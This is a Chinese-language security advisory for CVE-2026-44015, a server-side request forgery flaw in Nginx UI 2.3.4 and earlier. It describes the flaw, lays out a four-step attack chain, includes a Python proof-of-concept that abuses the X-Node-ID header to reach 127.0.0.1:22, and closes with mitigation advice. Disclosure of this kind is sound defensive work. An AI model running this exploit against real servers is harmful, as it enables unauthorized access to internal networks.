CVE-2026-44015 CVSS 8.5 高危

CVE-2026-44015 Nginx UI 服务端请求伪造漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44015

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nginx UI

漏洞概述

Nginx UI 2.3.4及更早版本存在服务器端请求伪造（SSRF）漏洞。由于Proxy中间件处理逻辑存在缺陷，经过身份验证的攻击者可以通过创建指向内部URL的集群节点，并在API请求中携带X-Node-ID请求头，将恶意请求转发至内网地址。此漏洞允许攻击者绕过网络分段限制，访问绑定在本地主机或内部网络上的敏感服务。

技术细节

该漏洞核心在于Nginx UI的Proxy中间件未正确校验用户通过X-Node-ID请求头指定的目标地址。应用程序允许用户自定义集群节点，攻击者利用低权限账号创建一个节点条目，将其地址配置为内网资源（如http://127.0.0.1:6379或内部管理API）。随后，攻击者在发送API请求时添加X-Node-ID头部指向该恶意节点。后端服务直接信任此头部配置，将请求代理至内网地址，且未限制可访问的内网范围。这使得攻击者能利用Nginx UI服务器作为跳板，探测内网端口、读取本地元数据或攻击内部未授权服务。由于攻击者控制了请求路径及内容，可能导致敏感信息泄露，甚至结合其他漏洞对内网造成更大破坏，严重威胁内网安全边界。

攻击链分析

STEP 1

步骤1: 信息收集与获取凭证

攻击者获取Nginx UI的低权限用户账号凭证。

STEP 2

步骤2: 创建恶意节点

攻击者登录后，创建一个新的集群节点，将其URL地址配置为目标内网敏感资源（如127.0.0.1或内部网段）。

STEP 3

步骤3: 发起SSRF攻击

攻击者向Nginx UI发送API请求，并在HTTP头部中插入X-Node-ID，值为上一步创建的恶意节点ID。

STEP 4

步骤4: 请求转发与利用

Proxy中间件解析X-Node-ID头部，将请求转发至攻击者指定的内网地址，实现内网探测或数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
TARGET_URL = "http://vulnerable-nginx-ui.com"
USERNAME = "attacker"
PASSWORD = "password"
INTERNAL_TARGET = "http://127.0.0.1:22" # Targeting internal SSH

session = requests.Session()

# Step 1: Authenticate to obtain a valid session
login_payload = {
    "username": USERNAME,
    "password": PASSWORD
}
session.post(f"{TARGET_URL}/api/login", json=login_payload)

# Step 2: Create a malicious cluster node pointing to internal address
node_payload = {
    "name": "Internal Node",
    "url": INTERNAL_TARGET
}
create_node_resp = session.post(f"{TARGET_URL}/api/nodes", json=node_payload)
node_id = create_node_resp.json().get('id') # Assuming API returns ID

# Step 3: Send SSRF request using the X-Node-ID header
# The Proxy middleware forwards the request to the node's URL
headers = {
    "X-Node-ID": str(node_id)
}

# Sending a request that will be proxied to 127.0.0.1:22
ssrf_resp = session.get(f"{TARGET_URL}/api/some-endpoint", headers=headers)

print(f"Response Status: {ssrf_resp.status_code}")
print(f"Response Body: {ssrf_resp.text[:200]}")

影响范围

Nginx UI <= 2.3.4

防御指南

临时缓解措施

建议立即升级至修复版本。如无法立即升级，应严格限制对Nginx UI的访问权限，仅允许可信IP地址连接，并密切监控日志中是否存在异常的X-Node-ID请求头或指向内网地址的异常访问记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表